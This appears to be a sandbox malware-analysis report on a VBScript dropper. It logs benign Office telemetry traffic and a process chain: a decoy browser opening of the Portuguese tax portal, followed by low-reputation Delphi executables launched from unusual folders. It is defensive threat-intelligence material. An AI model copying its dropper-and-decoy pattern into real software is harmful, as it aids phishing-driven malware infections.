                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                  ETag: "0x8DC582BE9DEEE28"
                                                                                                                  x-ms-request-id: 96da997d-001e-0028-355d-2cc49f000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140102Z-16547b76f7fk9g8vhC1DFW825400000000n000000000csme
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:02 UTC  1352               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                  139         192.168.2.4  49924        13.107.246.45   443
                                                                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                                                                  2024-11-14 14:01:02 UTC  192                OUT        GET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
2024-11-14 14:01:02 UTC | 517 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:02 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1405
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                  ETag: "0x8DC582BE12B5C71"
                                                                                                                  x-ms-request-id: 3018d77d-101e-008d-49d2-2c92e5000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140102Z-16547b76f7fj897nhC1DFWdwq40000000keg00000000mh9p
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


Session ID | Source IP | Source Port | Destination IP | Destination Port
140 | 192.168.2.4 | 49925 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:01:02 UTC | 192 | OUT | GET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
2024-11-14 14:01:02 UTC | 517 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:02 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1368
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                  ETag: "0x8DC582BDDC22447"
                                                                                                                  x-ms-request-id: ddaecdfb-101e-0079-21d2-2c5913000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140102Z-16547b76f7f7lhvnhC1DFWa2k00000000khg00000000fv19
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


Session ID | Source IP | Source Port | Destination IP | Destination Port
141 | 192.168.2.4 | 49927 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:01:03 UTC | 192 | OUT | GET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
2024-11-14 14:01:03 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:03 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1401
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                  ETag: "0x8DC582BE055B528"
                                                                                                                  x-ms-request-id: ce92c93d-101e-008e-6ea0-34cf88000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140103Z-1749fc9bdbd4dqj6hC1DFWr4n400000002rg000000002f6z
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


Session ID | Source IP | Source Port | Destination IP | Destination Port
142 | 192.168.2.4 | 49928 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:01:03 UTC | 192 | OUT | GET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
2024-11-14 14:01:03 UTC | 538 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:03 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1364
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                  ETag: "0x8DC582BE1223606"
                                                                                                                  x-ms-request-id: 98909b4d-d01e-002b-39d2-2c25fb000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140103Z-16547b76f7fkcrm9hC1DFWxdag0000000ky0000000001cy5
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


Session ID | Source IP | Source Port | Destination IP | Destination Port
143 | 192.168.2.4 | 49929 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:01:03 UTC | 192 | OUT | GET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
2024-11-14 14:01:03 UTC | 517 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:03 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1397
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                  ETag: "0x8DC582BE7262739"
                                                                                                                  x-ms-request-id: 2ce7ce6f-901e-002a-1fd2-2c7a27000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140103Z-16547b76f7f7scqbhC1DFW0m5w0000000kn000000000737a
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


Session ID | Source IP | Source Port | Destination IP | Destination Port
144 | 192.168.2.4 | 49931 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:01:03 UTC | 192 | OUT | GET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
2024-11-14 14:01:03 UTC | 538 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:03 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1403
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                  ETag: "0x8DC582BDCB4853F"
                                                                                                                  x-ms-request-id: 4630a231-e01e-0020-14ff-2bde90000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140103Z-16547b76f7f76p6chC1DFWctqw0000000kr000000000k8v8
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


Session ID | Source IP | Source Port | Destination IP | Destination Port
145 | 192.168.2.4 | 49930 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:01:03 UTC | 192 | OUT | GET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
2024-11-14 14:01:03 UTC | 538 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:03 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1360
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                  ETag: "0x8DC582BDDEB5124"
                                                                                                                  x-ms-request-id: 86fb53ab-501e-0078-4ed2-2c06cf000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140103Z-16547b76f7f8dwtrhC1DFWd1zn0000000ky0000000001f4r
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Timestamp: 2024-11-14 14:01:03 UTC, Bytes transferred: 1360, Direction: IN, Data:
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                  Session ID: 146
                                                                                                                  Source IP: 192.168.2.4
                                                                                                                  Source Port: 49934
                                                                                                                  Destination IP: 13.107.246.45
                                                                                                                  Destination Port: 443
                                                                                                                  Timestamp: 2024-11-14 14:01:04 UTC, Bytes transferred: 192, Direction: OUT, Data:
                                                                                                                  GET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  Timestamp: 2024-11-14 14:01:04 UTC, Bytes transferred: 517, Direction: IN, Data:
                                                                                                                  HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:04 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1366
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                  ETag: "0x8DC582BDB779FC3"
                                                                                                                  x-ms-request-id: fe4e74db-301e-003f-25bc-2c266f000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140104Z-16547b76f7fp6mhthC1DFWrggn0000000ktg00000000e5pr
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Timestamp: 2024-11-14 14:01:04 UTC, Bytes transferred: 1366, Direction: IN, Data:
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                  Session ID: 147
                                                                                                                  Source IP: 192.168.2.4
                                                                                                                  Source Port: 49935
                                                                                                                  Destination IP: 13.107.246.45
                                                                                                                  Destination Port: 443
                                                                                                                  Timestamp: 2024-11-14 14:01:04 UTC, Bytes transferred: 192, Direction: OUT, Data:
                                                                                                                  GET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  Timestamp: 2024-11-14 14:01:04 UTC, Bytes transferred: 538, Direction: IN, Data:
                                                                                                                  HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:04 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1397
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                  ETag: "0x8DC582BDFD43C07"
                                                                                                                  x-ms-request-id: ad01162d-901e-0064-5fc3-2ce8a6000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140104Z-16547b76f7fj897nhC1DFWdwq40000000kng000000005yhf
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Timestamp: 2024-11-14 14:01:04 UTC, Bytes transferred: 1397, Direction: IN, Data:
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                  Session ID: 148
                                                                                                                  Source IP: 192.168.2.4
                                                                                                                  Source Port: 49936
                                                                                                                  Destination IP: 13.107.246.45
                                                                                                                  Destination Port: 443
                                                                                                                  Timestamp: 2024-11-14 14:01:04 UTC, Bytes transferred: 192, Direction: OUT, Data:
                                                                                                                  GET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  Timestamp: 2024-11-14 14:01:04 UTC, Bytes transferred: 517, Direction: IN, Data:
                                                                                                                  HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:04 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1360
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                  ETag: "0x8DC582BDD74D2EC"
                                                                                                                  x-ms-request-id: 8fcaa1bb-301e-006e-11d2-2cf018000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140104Z-16547b76f7fcjqqhhC1DFWrrrc0000000kq000000000c2cr
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Timestamp: 2024-11-14 14:01:04 UTC, Bytes transferred: 1360, Direction: IN, Data:
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                  Session ID: 149
                                                                                                                  Source IP: 192.168.2.4
                                                                                                                  Source Port: 49937
                                                                                                                  Destination IP: 13.107.246.45
                                                                                                                  Destination Port: 443
                                                                                                                  Timestamp: 2024-11-14 14:01:04 UTC, Bytes transferred: 192, Direction: OUT, Data:
                                                                                                                  GET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  Timestamp: 2024-11-14 14:01:04 UTC, Bytes transferred: 515, Direction: IN, Data:
                                                                                                                  HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:04 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1427
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                  ETag: "0x8DC582BE56F6873"
                                                                                                                  x-ms-request-id: 384ed142-801e-0047-1f8c-327265000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140104Z-16547b76f7f22sh5hC1DFWyb4w0000000ks00000000011ry
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Timestamp: 2024-11-14 14:01:04 UTC, Bytes transferred: 1427, Direction: IN, Data:
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                  Target ID:0
                                                                                                                  Start time:08:59:46
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\guia_luqf.vbs"
                                                                                                                  Imagebase:0x7ff7b5ee0000
                                                                                                                  File size:170'496 bytes
                                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:1
                                                                                                                  Start time:08:59:47
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAP&path=/geral/dashboard
                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                  File size:3'242'272 bytes
                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:3
                                                                                                                  Start time:08:59:48
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=1976,i,15648558303082770842,9351964472762827409,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                  File size:3'242'272 bytes
                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  Target ID:5
                                                                                                                  Start time:09:00:06
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Users\Public\Termos\artigo.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\users\public\Termos\artigo.exe"
                                                                                                                  Imagebase:0x450000
                                                                                                                  File size:30'932'098 bytes
                                                                                                                  MD5 hash:31DF1F6E455D2A740E1A90E413F9DB68
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 5%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  Target ID:8
                                                                                                                  Start time:09:00:24
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Intrumental\place.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\Intrumental\place.exe
                                                                                                                  Imagebase:0x6d0000
                                                                                                                  File size:19'375'329 bytes
                                                                                                                  MD5 hash:971CB0CF2672A22241854896998DDE20
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 17%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  Target ID:9
                                                                                                                  Start time:09:00:30
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Intrumental\lspcv2.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\Intrumental\lspcv2.exe
                                                                                                                  Imagebase:0x1b0000
                                                                                                                  File size:32'891'509 bytes
                                                                                                                  MD5 hash:2047B6AC02B7C454F61D7E90EE1608FE
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 5%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  Target ID:10
                                                                                                                  Start time:09:00:39
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Intrumental\place.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Intrumental\place.exe"
                                                                                                                  Imagebase:0x6d0000
                                                                                                                  File size:19'375'329 bytes
                                                                                                                  MD5 hash:971CB0CF2672A22241854896998DDE20
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  Target ID:11
                                                                                                                  Start time:09:00:47
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Intrumental\lspcv2.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Intrumental\lspcv2.exe"
                                                                                                                  Imagebase:0x1b0000
                                                                                                                  File size:32'891'509 bytes
                                                                                                                  MD5 hash:2047B6AC02B7C454F61D7E90EE1608FE
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  Target ID:12
                                                                                                                  Start time:09:00:55
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Intrumental\place.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Intrumental\place.exe"
                                                                                                                  Imagebase:0x6d0000
                                                                                                                  File size:19'375'329 bytes
                                                                                                                  MD5 hash:971CB0CF2672A22241854896998DDE20
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  Target ID:13
                                                                                                                  Start time:09:01:03
                                                                                                                  Start date:14/11/2024
                                                                                                                  Path:C:\Intrumental\lspcv2.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Intrumental\lspcv2.exe"
                                                                                                                  Imagebase:0x1b0000
                                                                                                                  File size:32'891'509 bytes
                                                                                                                  MD5 hash:2047B6AC02B7C454F61D7E90EE1608FE
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:Borland Delphi
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2969589376.0000002D79CFA000.00000004.00000010.00020000.00000000.sdmp, Offset: 0000002D79CFA000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_2d79cfa000_lspcv2.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8bc41c436218621be89041d8b7a2e1c058d11f35d7a2bcef4b03cfed61d341d4
                                                                                                                    • Instruction ID: 6e9153f0fbb11754642e65d4ded23193d2e675329029f57caf03594e5e859ffc
                                                                                                                    • Opcode Fuzzy Hash: 8bc41c436218621be89041d8b7a2e1c058d11f35d7a2bcef4b03cfed61d341d4
                                                                                                                    • Instruction Fuzzy Hash: E2510BA680E7C18FD7138BB889796917FB29E27218B0E05CBC4C1CF0E7E25C5859D762